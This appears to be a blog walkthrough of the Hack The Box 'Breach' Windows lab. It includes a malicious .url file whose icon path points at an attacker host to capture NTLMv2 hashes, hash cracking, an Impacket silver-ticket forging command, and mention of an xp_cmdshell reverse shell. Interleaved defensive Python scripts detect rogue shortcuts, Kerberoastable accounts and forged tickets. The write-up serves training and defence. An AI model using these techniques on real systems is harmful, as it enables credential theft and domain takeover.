
HTB Breach Machine

  • BlueDolphin
  • 2 days ago
  • 4 min read

Link to the official lab.


Official Synopsis

Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials. With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server. Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.


My Engagement Flow


Tools Used

  • Impacket suite

  • SharpHound

  • BloodHound (bloodhound-python, which ships natively in Parrot)

  • Responder

  • enum4linux

  • smbclient

  • pypykatz

  • ticketer


Tactics/Techniques

  • Anonymous SMB access

  • Man in the middle attack

  • Hash cracking

  • Malicious .url file development


References


Step by Step Summary

  1. Host enumeration

    • Kerberos services

    • Open SMB share no auth required

    • MSSQL Service

  2. Foothold

    1. Create a malicious .url file with a pointer to our host

    2. Upload malicious file to open SMB share

    3. Wait for user to navigate to the folder and select our file.

      1. This will force an NTLM auth

    4. Use responder to listen to the auth request to grab the hash

      1. Crack the hash

    5. Authenticate with Julia's credentials.

  3. Lateral Movement

    1. Enumerate AD

      1. BloodHound to enumerate

      2. BloodHound to visualize findings

      3. List all Kerberoastable Accounts

    2. Retrieve vulnerable account SPN identifier

      1. Crack the SPN hash

      2. Authenticate to the domain with new credentials

    3. Forge a silver ticket

      1. Authenticate to MSSQL as admin

    4. Call xp_cmdshell from SQL to launch a reverse shell for access.


Host enumeration

Our scan results paint a picture of an Active Directory environment. We see key ports such as 88 for Kerberos, 389 for LDAP, and MSSQL on 1433. The domain name is breach.vl.


enum4linux

Let's get some more information by using enum4linux.

We learn that the file share allows anonymous access.


smbclient -N -L

We are able to list the file shares without authenticating.


Who's who in the zoo

Looking under the transfer folder reveals usernames. Julia.wong is the most recent user, with activity from April 16th.


Foothold

Quick summary for Foothold

  1. Create a malicious .url file with a pointer to our host

  2. Upload malicious file to open SMB share

  3. Wait for user to navigate to the folder and select our file.

    1. This will force an NTLM auth

  4. Use responder to listen to the auth request to grab the hash

    1. Crack the hash

  5. Authenticate with Julia's credentials.


Because we have write access to the share, the attack depends on a user interacting with a file we place there. The approach is to force the authentication request to our own host, where a tool such as Responder can capture it. With the captured NTLMv2 response we can then attempt to crack the password of the user who authenticated.


  1. Create a malicious .url file with a pointer to our host:

    Let's create an Internet shortcut file that points to our server and save it as a .url file. The IconFile entry is what matters: Explorer tries to fetch the icon over SMB as soon as the folder is viewed, which triggers the authentication.

[InternetShortcut]
URL=boom
WorkingDirectory=hehe
IconFile=\\attacking ip\boom\nc.ico
IconIndex=1
  2. Upload malicious file to open SMB share

  3. Wait for user to navigate to the folder and select our file.

    1. This will force an NTLM auth

  4. Use responder to listen to the auth request to grab the hash

    1. Crack the hash

Responder output below (the captured hash is truncated here):

[SMB] NTLMv2-SSP Client   : 10.129.227.163
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:5659b015ce45205b[...]

Crack the hash and retrieve the password. NTLMv2-SSP responses are hashcat mode 5600, and the wordlist must be decompressed first because hashcat does not read .gz files.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Computer1

  5. Authenticate with Julia's credentials.
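The foothold above works because a writable share lets anyone drop a shortcut whose icon lives on a host they control. As an added defensive example (not code from the original post or from the lab), the following Python scanner walks a mounted share and flags .url and .scf files whose IconFile, URL or WorkingDirectory values point at a host outside an allow-list, which is exactly the artefact this technique leaves on disk. The share contents, the documentation address 203.0.113.5 and the trusted host names are constructed for the example.

```python
import os
import re
import tempfile

# Text-based shortcut formats Explorer parses for icon/target paths the moment a
# folder is browsed (.lnk is binary and would need a separate parser).
SHORTCUT_SUFFIXES = ("url", "scf")

# Assumption: hosts that are legitimately allowed to serve icons to domain clients.
TRUSTED_HOSTS = {"filesrv01", "filesrv01.breach.vl", "breachdc.breach.vl"}

# key=\\host\share\...  (UNC path)   and   key=file://host/...  (file URL)
UNC_VALUE = re.compile(r"^(?P<key>\w+)\s*=\s*\\\\(?P<host>[^\\]+)\\", re.M)
FILE_URL = re.compile(r"^(?P<key>\w+)\s*=\s*file://(?P<host>[^/\\]+)[/\\]", re.M | re.I)


def find_remote_pointers(text):
    """Return (key, host) pairs for every value that references a remote host."""
    hits = [(m.group("key"), m.group("host")) for m in UNC_VALUE.finditer(text)]
    for m in FILE_URL.finditer(text):
        if not re.fullmatch(r"[A-Za-z]:", m.group("host")):  # skip file://C:/... drive paths
            hits.append((m.group("key"), m.group("host")))
    return hits


def classify(name, text, trusted=TRUSTED_HOSTS):
    """Findings for one file: each pointer to a host outside the trusted set."""
    if name.lower().rsplit(".", 1)[-1] not in SHORTCUT_SUFFIXES:
        return []
    return [f"{name}: {key} points at untrusted host {host}"
            for key, host in find_remote_pointers(text)
            if host.lower() not in trusted]


def scan_directory(root):
    """Walk a mounted share (or any directory) and collect findings for shortcut files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings.extend(classify(os.path.relpath(path, root), fh.read()))
    return sorted(findings)


# Constructed sample share contents (not from the page); 203.0.113.5 is a documentation address.
SAMPLES = {
    "transfer/readme.url": "[InternetShortcut]\nURL=https://intranet.breach.vl/docs\n",
    "transfer/nc.url": "\n".join(["[InternetShortcut]", "URL=boom", "WorkingDirectory=hehe",
                                  r"IconFile=\\203.0.113.5\boom\nc.ico", "IconIndex=1"]),
    "transfer/share.scf": "\n".join(["[Shell]", "Command=2",
                                     r"IconFile=\\203.0.113.5\share\icon.ico"]),
    "transfer/local.url": "\n".join(["[InternetShortcut]", "URL=file://C:/docs",
                                     r"IconFile=\\FILESRV01\icons\doc.ico"]),
}


def scan_samples():
    """Write the constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_directory(root)


if __name__ == "__main__":
    for line in scan_samples():
        print(line)
```

Run it against a read-only mount of the share. A hit on an IconFile that names a bare IP or an unknown host is the precursor to the NTLM capture described above; removing guest write access to the share, and blocking outbound SMB (445) from clients to anything but known file servers, stops the technique at its root.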


Lateral movement

Quick summary


  1. Enumerate AD

    1. BloodHound to enumerate

    2. BloodHound to visualize findings

    3. List all Kerberoastable Accounts

  2. Retrieve vulnerable account SPN identifier

    1. Crack the SPN hash

    2. Authenticate to the domain with new credentials

  3. Forge a silver ticket

    1. Authenticate to MSSQL as admin

  4. Call xp_cmdshell from SQL to launch a reverse shell for access.


With access to the system as a low-privileged user we will enumerate the Active Directory domain for any paths to escalation. This can be accomplished with BloodHound. To clarify: SharpHound (or bloodhound-python, as used here) is what actually enumerates the domain and collects the data, and BloodHound only visualizes that data once it is uploaded. It is here we learn that there is an account with an SPN set, which becomes the focus of our next path.


  1. Enumerate AD

    1. BloodHound to enumerate

    2. BloodHound to visualize findings

    3. List all Kerberoastable Accounts


bloodhound-python -d breach.vl -u 'julia.wong' -p 'Computer1' -dc 'BREACHDC.breach.vl' -c all -ns 10.129.223.31 --dns-tcp
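BloodHound's "Kerberoastable accounts" query is simply a filter over user objects that carry a servicePrincipalName. As an added example (not code from the original post, the lab, or BloodHound itself), the Python audit below applies the same filter to a constructed directory snapshot and, for each account it finds, explains why a defender should care: password age, privilege, and whether the KDC would issue RC4 tickets for it. svc_mssql and its SPN MSSQLSvc/breachdc.breach.vl come from the write-up; every other account, the dates and the attribute values are invented.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Bits of msDS-SupportedEncryptionTypes (AES128 = 0x08, AES256 = 0x10). An unset
# attribute (0) means the KDC issues RC4 service tickets, which crack far faster.
AES_BITS = 0x08 | 0x10
UAC_ACCOUNTDISABLE = 0x0002


@dataclass
class Account:
    """Subset of AD user attributes relevant to this audit (constructed, not the lab's data)."""
    sam: str
    spns: list = field(default_factory=list)
    pwd_last_set: datetime = datetime(2000, 1, 1, tzinfo=timezone.utc)
    uac: int = 0x0200           # NORMAL_ACCOUNT
    admin_count: int = 0
    enc_types: int = 0
    object_class: str = "user"


def is_kerberoastable(acct):
    """Enabled, non-machine, non-gMSA account with an SPN: any domain user can request its ticket."""
    if not acct.spns or acct.uac & UAC_ACCOUNTDISABLE:
        return False
    if acct.sam.endswith("$") or acct.sam.lower() == "krbtgt":
        return False   # machine/gMSA passwords are long and random; krbtgt is a separate risk
    return acct.object_class != "msDS-GroupManagedServiceAccount"


def audit_kerberoastable(accounts, now, max_password_age_days=365):
    """Return (sAMAccountName, spns, reasons) for each roastable account."""
    findings = []
    for a in accounts:
        if not is_kerberoastable(a):
            continue
        reasons = []
        age = (now - a.pwd_last_set).days
        if age > max_password_age_days:
            reasons.append(f"password last set {age} days ago")
        if a.admin_count:
            reasons.append("privileged account (adminCount=1)")
        if not a.enc_types & AES_BITS:
            reasons.append("RC4-only service tickets (no AES in msDS-SupportedEncryptionTypes)")
        findings.append((a.sam, sorted(a.spns), reasons))
    return findings


NOW = datetime(2024, 4, 20, tzinfo=timezone.utc)   # fixed "current" time for reproducible output

# Constructed directory snapshot; only svc_mssql and its SPN are taken from the write-up.
SAMPLE_ACCOUNTS = [
    Account("svc_mssql", ["MSSQLSvc/breachdc.breach.vl"],
            pwd_last_set=datetime(2022, 1, 10, tzinfo=timezone.utc)),
    Account("svc_backup", ["backup/backupsrv.breach.vl"],
            pwd_last_set=datetime(2024, 3, 1, tzinfo=timezone.utc), admin_count=1, enc_types=AES_BITS),
    Account("svc_old", ["http/legacy.breach.vl"], uac=0x0200 | UAC_ACCOUNTDISABLE),
    Account("gmsa_web$", ["http/web.breach.vl"], object_class="msDS-GroupManagedServiceAccount"),
    Account("BREACHDC$", ["ldap/breachdc.breach.vl", "cifs/breachdc.breach.vl"]),
    Account("krbtgt", ["kadmin/changepw"]),
    Account("julia.wong"),
]

if __name__ == "__main__":
    for sam, spns, reasons in audit_kerberoastable(SAMPLE_ACCOUNTS, NOW):
        print(sam, spns, "; ".join(reasons))
```

In a real environment the Account list would be filled from an LDAP query for `(&(objectCategory=user)(servicePrincipalName=*))`. The fix for every finding is the same: move the service to a gMSA or give it a long random password, and set AES on msDS-SupportedEncryptionTypes so the ticket the attacker obtains is not an RC4 one.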

  2. Retrieve vulnerable account SPN identifier

    1. Crack the SPN hash

    2. Authenticate to the domain with new credentials


Impacket features a tool that requests service tickets from Kerberos for accounts with an SPN set, given any domain user's password. The ticket is encrypted with the service account's password hash, which is what makes it crackable offline.


With the ticket hash in hand we can attempt to crack it, but this only succeeds if the service account's password is simple enough to appear in a wordlist.


pypykatz calculates the NT hash of a given password and outputs it to STDOUT; this is the hash ticketer needs in the next step.

  3. Forge a silver ticket

    1. Authenticate to MSSQL as admin


ticketer.py (Impacket) is used to forge a silver ticket and requires the following:

  • the SPN of the target service (-spn)

  • the domain SID (-domain-sid)

  • the NT hash of the service account's password (-nthash)

  • the domain controller IP (-dc-ip)

  • the user ID (RID) to impersonate (-user-id), 500 being Administrator

ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -dc-ip 10.129.223.136 -domain breach.vl -user-id 500 Administrator
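A silver ticket never touches the KDC: the service ticket is minted from svc_mssql's hash and presented straight to MSSQL. That gives defenders a correlation to look for, and the Python below is an added example (not from the original post or from the lab) of that check: every Kerberos network logon (event 4624) on the service host should be preceded by a matching TGS request (event 4769) for the same account on the domain controller within the ticket lifetime, and the Account Domain in a genuine 4624 is the NetBIOS name. The events are constructed and simplified; only the SPN MSSQLSvc/breachdc.breach.vl, the domain and the Administrator target are taken from the write-up.

```python
from datetime import datetime, timedelta

# Default maximum service ticket lifetime in AD (10 hours): a legitimate 4624 Kerberos
# logon should be preceded by a 4769 for that account and service within this window.
TICKET_LIFETIME = timedelta(hours=10)
NETBIOS_DOMAIN = "BREACH"   # expected Account Domain in genuine 4624 events

# Assumption: which SPNs are hosted where (SQL runs on the DC in this lab).
HOST_SERVICES = {
    "BREACHDC": {"MSSQLSvc/breachdc.breach.vl", "cifs/breachdc.breach.vl"},
}

# Constructed, simplified events: 4769 is logged on the KDC, 4624 on the service host.
SAMPLE_EVENTS = [
    {"time": "2024-04-20T09:00:05", "host": "BREACHDC", "id": 4769, "account": "julia.wong",
     "service": "cifs/breachdc.breach.vl"},
    {"time": "2024-04-20T09:00:07", "host": "BREACHDC", "id": 4624, "account": "julia.wong",
     "domain": "BREACH", "logon_type": 3, "package": "Kerberos"},
    # Administrator logon to the SQL host with no TGS request anywhere in the KDC log and a
    # DNS-style Account Domain: the shape a forged service ticket tends to leave behind.
    {"time": "2024-04-20T09:15:00", "host": "BREACHDC", "id": 4624, "account": "Administrator",
     "domain": "breach.vl", "logon_type": 3, "package": "Kerberos"},
    {"time": "2024-04-20T09:20:00", "host": "BREACHDC", "id": 4624, "account": "svc_backup",
     "domain": "BREACH", "logon_type": 3, "package": "NTLM"},   # NTLM logon, out of scope here
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def tgs_issued_for(logon, tgs_events, host_services, lifetime):
    """True if the KDC issued this account a ticket for a service on the logon host within lifetime."""
    services = host_services.get(logon["host"], set())
    for g in tgs_events:
        delta = _ts(logon) - _ts(g)
        if (g["account"].lower() == logon["account"].lower()
                and g["service"] in services
                and timedelta(0) <= delta <= lifetime):
            return True
    return False


def find_suspicious_service_logons(events, host_services=HOST_SERVICES, lifetime=TICKET_LIFETIME):
    """Kerberos network logons with no matching TGS request, or with an unexpected Account Domain."""
    tgs_events = [e for e in events if e["id"] == 4769]
    findings = []
    for e in events:
        if e["id"] != 4624 or e["package"] != "Kerberos" or e["logon_type"] != 3:
            continue
        reasons = []
        if not tgs_issued_for(e, tgs_events, host_services, lifetime):
            reasons.append("no 4769 for this account and host within ticket lifetime")
        if e["domain"] != NETBIOS_DOMAIN:
            # Documented indicator for tickets forged by some tools; supporting evidence, not proof.
            reasons.append(f"Account Domain {e['domain']!r} is not the NetBIOS name {NETBIOS_DOMAIN!r}")
        if reasons:
            findings.append((e["time"], e["host"], e["account"], reasons))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_service_logons(SAMPLE_EVENTS):
        print(finding)
```

Two caveats for production use: the KDC log must be complete (every DC, no gaps), and renewed or cached tickets can legitimately stretch the window, so tune the lifetime to your domain policy. Detection is the backstop; the durable fix is the one implied by the ticketer command itself, which needs only the service account's NT hash: give svc_mssql a long random password or convert it to a gMSA, and rotate it twice after any suspected compromise.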


  4. Call xp_cmdshell from SQL to launch a reverse shell for access.



Going further with privilege escalation involves finding that the account holds SeImpersonatePrivilege, and simply running GodPotato for the reverse shell.






THE END